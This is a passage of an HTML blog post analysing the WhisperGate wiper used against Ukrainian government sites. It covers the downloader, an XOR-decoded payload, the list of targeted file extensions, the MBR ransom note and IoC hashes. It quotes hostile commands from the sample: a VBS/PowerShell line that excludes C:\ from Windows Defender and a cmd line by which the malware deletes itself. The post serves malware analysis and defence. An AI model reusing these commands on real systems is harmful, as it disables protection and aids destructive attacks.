margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEi3h9czJOHtNbsRcZgIvXuUnyEbY2xlSiJ6ogdOZMpUy7mJhIN3QzBHHdnJ3NiefDkCMjzXqqNj7ppWlB_U9EPCanISWmaqRcgzvdvMGFiIbWT5u8XWVzZY4ILUYf3Dj-DlzCaX0PsTCoPHAsASVs2HQxk2UbexjbeC1heZ2fXIXPO0rMn2ZxuiIfUQyA" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="327" data-original-width="1271" src="https://blogger.googleusercontent.com/img/a/AVvXsEi3h9czJOHtNbsRcZgIvXuUnyEbY2xlSiJ6ogdOZMpUy7mJhIN3QzBHHdnJ3NiefDkCMjzXqqNj7ppWlB_U9EPCanISWmaqRcgzvdvMGFiIbWT5u8XWVzZY4ILUYf3Dj-DlzCaX0PsTCoPHAsASVs2HQxk2UbexjbeC1heZ2fXIXPO0rMn2ZxuiIfUQyA=s16000" /></a></div><p></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcSDSCC-LL65i690zQsYwOWQjpWZh51bHsOc_C4eT2LdcWXstVsANduxn0-BkaBJ8OTEO6LzppscyDpywDqU4pnrN0hdSfXNYfm_DFL4_YMnmZc_1x7metKuL3otFHPrRoYWicaYlwp8Uf/" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="772" data-original-width="1047" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcSDSCC-LL65i690zQsYwOWQjpWZh51bHsOc_C4eT2LdcWXstVsANduxn0-BkaBJ8OTEO6LzppscyDpywDqU4pnrN0hdSfXNYfm_DFL4_YMnmZc_1x7metKuL3otFHPrRoYWicaYlwp8Uf/s16000/discord.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"></td></tr></tbody></table><p></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: center;"><span style="color: #141519; font-family: Arial; font-size: 11pt; white-space: pre-wrap;">Download data from the hardcoded link</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">This file also contains a command, encoded in Base64 format: ‘UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBzACAAMQAwAA==’, which will be given to the PowerShell with the ‘-enc’ parameter. This means that the PowerShell script will decode this string before execution. The decoded command is ‘Start-Sleep -s 10’. This command is used to suspend the activity for the specified period and used for the C2 server connection.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="background-color: white; color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 123px; overflow: hidden; width: 600px;"><img height="123" src="https://lh3.googleusercontent.com/2ilelGyqMaxTGYok0HbUwuFtsjEoU12EqEiSkgDSDN7ujiA-S5nefbRHv-bjGiF2FtzKdj8u4WpYIwZuSiXcdJ-mhjcVqe8G9R_WQRzj_XQXZSZpVh1ZO4JKVzXfx0up_ffGrgZL" style="margin-left: 0px; margin-top: 0px;" width="600" /></span></span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 11pt 0pt; text-align: left;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 105px; overflow: hidden; width: 576px;"><img height="105" src="https://lh5.googleusercontent.com/DRToS5ZA7ov2UZJW3j6ONWvpGjX2aonO3Jaw4jYu1j_YyHmslijtg_D5dDmMwRZk9mBjJRMRNZ8Xz33pqFdciUETrne5gaokHJaheGOCpHsEYv-QvqZ4pGfLQF-XJKXCgMYIfRWi" style="margin-left: 0px; margin-top: 0px;" width="576" /></span></span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: center;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Executing the encoded PowerShell command</span></p><h3 dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 0pt 0pt 11pt; text-align: justify;"><span style="background-color: transparent; color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">File Corrupter (Tbopbh.jpg / Frkmlkdkdubkznbkmcf.dll)</span></h3><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Downloaded Tbopbh.jpg file is a picture, which will be decoded to the Frkmlkdkdubkznbkmcf.dll (SHA256:923eb77b3c9e11d6c56052318c119c1a22d11ab71675e6b95d05eeb73d1accd6). This file is a .NET library and contains 3 resources:</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 124px; overflow: hidden; width: 320px;"><img height="137.55853780120657" src="https://lh3.googleusercontent.com/2mTrDY36bRpvY3AFndanS5kNvy0Dthq1MaPf4aoUpejB6QwuIh2BRBEDGn6Qgt3spPOboqbAWs9VyUu-g2JpljzUMISTIMLbq1766PoXgu7E0AXe8-O7OXOLF6e1B9WOyMu8aIRl" style="margin-left: 0px; margin-top: 0px;" width="320" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Frkmlkdkdubkznbkmcf.dll loads resource ‘78c855a088924e92a7f60d661c3d1845’ and calls the decryption function.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 191px; overflow: hidden; width: 624px;"><img height="191" src="https://lh5.googleusercontent.com/QjaY1DQPv8Gb7081C_zXcWoeVu7Cz5wp-jThllssFjlKOq9bUWpfXexu52ziYCToqALJLNoXkUZ7TiuxPe9u-yZJFWyRwqPWMdASLwfA2WLtvnZ30WjQ33NrF4LHagXuAdDcziye" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Resource loading </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The decryption function will decode this resource using the XOR operation. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 384px; overflow: hidden; width: 624px;"><img height="384" src="https://lh5.googleusercontent.com/V6nYMghQzpt1Bwy81_CDEO-sHZW5umz7tVklKL63NGfPN-zoX1EYCOfpsxjXPvXjBTaAnng5JDmcFc4vMhQbjLJW6-dWrvNLxc5EsxLy6DS-zlx_DD00bfVbVcOmSj-NLfXkJyoa" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Decoding resource</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">During execution, the decoded resource drops two additional files in the %Temp% folder. The first file is ‘AdvansedRun.exe’ which will disable Windows Defender by executing the second file ‘Nmddfrqqrbyjeygggda.vbs’. This script contains a command that excludes the ‘C:\’ folder from Windows Defender scanning:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><blockquote><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:\'", 0, False</span></blockquote><p></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Next, the malware drops ‘InstallUtil.exe’ to the ‘%Temp’ folder and executes it. This program is the Microsoft utility for installing server resources and has a valid digital signature.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 332px; overflow: hidden; width: 246px;"><img height="332" src="https://lh3.googleusercontent.com/3sEJz8n2yMOR7A7V8zwbo3YqCS9o52Pxf7skuqJLP_oYXZ2pFTtt-px-17t7KmpC_vT1anqrvMPE7hxaa7ap1O1lishftiu-Tg3xnE2QjtXLsMcmRzDAQLiglCd8zk2uUrY2EaqE" style="margin-left: 0px; margin-top: 0px;" width="246" /></span></span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 332px; overflow: hidden; width: 276px;"><img height="332" src="https://lh3.googleusercontent.com/FBk-_DdNnzSuiTl6qHc8v-sKYKqOW62pw0sqwLgkp9MQKEepKsecEo9KZNXMlnR26gmRUzeqmg2PwncHvYtrDWtA42EuqT5rFrtn7W75BO_fM5puqxzBW0hGQPHFAJskvyTQLqK1" style="margin-left: 0px; margin-top: 0px;" width="276" /></span></span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">InstallUtil.exe properties</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">During execution, this program writes 22.53GB of bytes on the disk. The original program doesn’t contain any suspicious code, so we can suppose that the WhisperGate injects malicious code in this process for file corruption.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 377px; overflow: hidden; width: 294px;"><img height="377" src="https://lh6.googleusercontent.com/COv6-HFbRSx0w8T6YvGXkooLFV2SgRjWK1foY46bKBqOAGI2xdmk9IkxptyOTSTWnO1ENrwajK5IgLrfXsJjWdNC1Tf-rTuGZzbtP5AurrIY5BmHEm2HSZDUDvpMLjSpfKo3of68" style="margin-left: 0px; margin-top: 0px;" width="294" /></span></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The File Wiper corrupts the files with the following file extensions:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><blockquote><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.HTML .HTM .PHTML .PHP .JSP .ASP .PHPS .PHP5 .ASPX .PHP4 .PHP3 .DOC .DOCX .XLS .XLSX .PPT .PPTX .PST .MSG .EML .TXT .CSV .RTF .WKS .WK1 .PDF .DWG .JPEG .JPG .DOCM .DOT .DOTM .XLSM .XLSB .XLW .XLT .XLM .XLC .XLTX .XLTM .PPTM .POT .PPS .PPSM .PPSX .HWP .SXI .STI .SLDX .SLDM .BMP .PNG .GIF .RAW .TIF .TIFF .PSD .SVG .CLASS .JAR .SCH .VBS .BAT .CMD .ASM .PAS .CPP .SXM .STD .SXD .ODP .WB2 .SLK .DIF .STC .SXC .ODS .3DM .MAX .3DS .STW .SXW .ODT .PEM .P12 .CSR .CRT .KEY .PFX .DER .OGG .JAVA .INC .INI .PPK .LOG .VDI .VMDK .VHD .MDF .MYI .MYD .FRM .SAV .ODB .DBF .MDB .ACCDB .SQL .SQLITEDB .SQLITE3 .LDF .ARC .BAK .TAR .TGZ .RAR .ZIP .BACKUP .ISO .CONFIG</span></blockquote><p></p><table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhDYpGJJizNfp4TO5Y0RvQiu3JJKmGqbk4pEtSSKCZmNWQ3yKaj63-tWN5l44CG0O5V7ttrcCtRbChgQgRjcMykwAIBb4BVoP4Pgw4uwU8vzr_6rYJngcEnsxBVwiCWIYSRBTCVQMFzFamRSk9RXDaXPG625kS8CMyqjYzWLYdcv9jdv6Dy5Cprc_BsKg" style="margin-left: auto; margin-right: auto;"><img alt="" data-original-height="336" data-original-width="476" src="https://blogger.googleusercontent.com/img/a/AVvXsEhDYpGJJizNfp4TO5Y0RvQiu3JJKmGqbk4pEtSSKCZmNWQ3yKaj63-tWN5l44CG0O5V7ttrcCtRbChgQgRjcMykwAIBb4BVoP4Pgw4uwU8vzr_6rYJngcEnsxBVwiCWIYSRBTCVQMFzFamRSk9RXDaXPG625kS8CMyqjYzWLYdcv9jdv6Dy5Cprc_BsKg=s16000" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;"></td></tr></tbody></table><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgkMEOiidXQgJg87w3MZgUapfDIhTKD-TslnqvC485LeqRU1XVS8mVXJCkDI0EAyM5kAFenqLeQU94WPCrwGLR_p0buGcZU1bkCjR5bfG5vnTkWOE2OhGpHcSHesN6hn1R-VE5C8xclGLrlWygUinz5OkHWvE244qSI47IbfdQvll4VKHOINpN6O-0ERw" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="538" data-original-width="644" src="https://blogger.googleusercontent.com/img/a/AVvXsEgkMEOiidXQgJg87w3MZgUapfDIhTKD-TslnqvC485LeqRU1XVS8mVXJCkDI0EAyM5kAFenqLeQU94WPCrwGLR_p0buGcZU1bkCjR5bfG5vnTkWOE2OhGpHcSHesN6hn1R-VE5C8xclGLrlWygUinz5OkHWvE244qSI47IbfdQvll4VKHOINpN6O-0ERw=s16000" /></a></div><p></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">If the file extension matches one of these saved extensions, the contents of the file will be rewritten with 100000h (1048576 bytes) of the ‘0xC’ byte with appending a random 4-byte to its extension.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"></p><div class="separator" style="clear: both; text-align: left;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEggcht37XSoV4Zcur3_QaXNTc2fPK9ENfNKUFML6PKgcpthaLvY9Ds--7wGRMPYQOC6jO976oNIKXZH8Fc8nivW6FROV0iZU74Ksn6_emUvsU5zkox4dugsx_DjKJZtbfNvWKR945-FAEPd6N77lTwcm4lVlw3gCS4MRd3h8PKaNHFtXQQLraTQSZSDzg" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="620" data-original-width="1095" src="https://blogger.googleusercontent.com/img/a/AVvXsEggcht37XSoV4Zcur3_QaXNTc2fPK9ENfNKUFML6PKgcpthaLvY9Ds--7wGRMPYQOC6jO976oNIKXZH8Fc8nivW6FROV0iZU74Ksn6_emUvsU5zkox4dugsx_DjKJZtbfNvWKR945-FAEPd6N77lTwcm4lVlw3gCS4MRd3h8PKaNHFtXQQLraTQSZSDzg=s16000" /></a></div><br /><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgmyNFzRFNcDwSP6f-ICa9G2RVmCFL04qu6VHLMc59ideAw2_Fz7YduSOn6CtZ-ttAt0Og1pFG9jQMz7YKiZjuoPoLlhyJcS9dq6-m6SPLaVgILNECpdA8LJb2sFLDnAjovzvLm_XqvhqWMAKRUf0_wFFk5CtrZ25se8djU8z8EXO-5sMiGkCKCP7yUiQ" style="font-family: Arial; font-size: 11pt; margin-left: 1em; margin-right: 1em; white-space: pre-wrap;"><img alt="" data-original-height="167" data-original-width="1247" src="https://blogger.googleusercontent.com/img/a/AVvXsEgmyNFzRFNcDwSP6f-ICa9G2RVmCFL04qu6VHLMc59ideAw2_Fz7YduSOn6CtZ-ttAt0Og1pFG9jQMz7YKiZjuoPoLlhyJcS9dq6-m6SPLaVgILNECpdA8LJb2sFLDnAjovzvLm_XqvhqWMAKRUf0_wFFk5CtrZ25se8djU8z8EXO-5sMiGkCKCP7yUiQ=s16000" /></a><p></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">After the process of file corrupting is done, the malware executes </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">ping</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> command and deletes itself:</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"></span></p><blockquote><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">"cmd.exe /min /C ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q "%s"</span></blockquote><p></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Obfuscation</span></h3><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">All .NET files are obfuscated with Ezfuscator. Also, file ‘stage2.exe’ has a control flow and methods' name obfuscation.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 11pt 0pt; text-align: left;"><span style="color: #141519; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 255px; overflow: hidden; width: 624px;"><img height="255" src="https://lh4.googleusercontent.com/5Kqo-BiTANn7U7LzJLfuUUFI1oIBJth1DkSYpyhwZ9emNNyHzJlXdTPiX0-pzJmwPbvqU6hlwJ7ARediEnTSN75Nv9b4VM0i35EhKEB8_Jjd31zAIKGfA5CoY3c_3HTgS9PH_OX5" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: justify;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Ransom note</span></h3><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The ransom note is written to the MBR (the very beginning of the bootable disk partition) and will be displayed on the screen when the system is rebooted.</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="border: none; display: inline-block; height: 135px; overflow: hidden; width: 624px;"><img height="135" src="https://lh3.googleusercontent.com/n1velXzJzH7fkMdKzeyN3qTUhtq4DQ91SxE6E6gzEScDkas0uXgx9lX7ebdvPzhz4P-uybHsHFwWFWZXrl68DzBHDo_aMY93qdw2WbCoLtauTlCEhbMaZ0i5-NisHM8yjagyfqeN" style="margin-left: 0px; margin-top: 0px;" width="624" /></span></span></p><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 16pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Conclusion</span></h2><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">The WhisperGate was used in the targeted attack against Ukrainian government websites in the middle of January 2022. This operation consists of two stages. At the first stage, the malware overwrites the MBR with the ransom note making the system not bootable and displaying the message with the ransom. At another one, the Trojan-Downloader downloads the malware that corrupts files overwriting its contents with a fixed number of bytes. Despite the fact that the malware broke the functionality and all the websites stopped working, they have been restored the next day.</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p><h1 style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Watch the recording of the lecture with WhisperGate analysis</span></h1><br /><div class="separator" style="clear: both; text-align: left;"><iframe allowfullscreen="" class="BLOG_video_class" height="266" src="https://www.youtube.com/embed/XxN4cINiLqA" width="320" youtube-src-id="XxN4cINiLqA"></iframe></div><br /><h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 16pt; font-weight: 400; white-space: pre-wrap;">IoCs </span></h2><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span style="color: #434343; font-family: Arial; font-size: 14pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space: pre-wrap;">Files</span></h3><br /><div align="left" dir="ltr" style="margin-left: 3pt;"><table style="border-collapse: collapse; border: none;"><colgroup><col width="108"></col><col width="488"></col></colgroup><tbody><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">File name</span></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">SHA256</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">stage1.exe</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">a196c6b8ffcb97ffb276d04f354696e2391311db3841ae16c8c9f56f36a38e92</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/file/dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">stage2.exe</span></a></p></td><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 10pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78</span></p></td></tr><tr style="height: 0pt;"><td style="border-bottom: solid #000000 1pt; border-color: rgb(0, 0, 0); border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-style: solid; border-top: solid #000000 1pt; border-width: 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;"><a 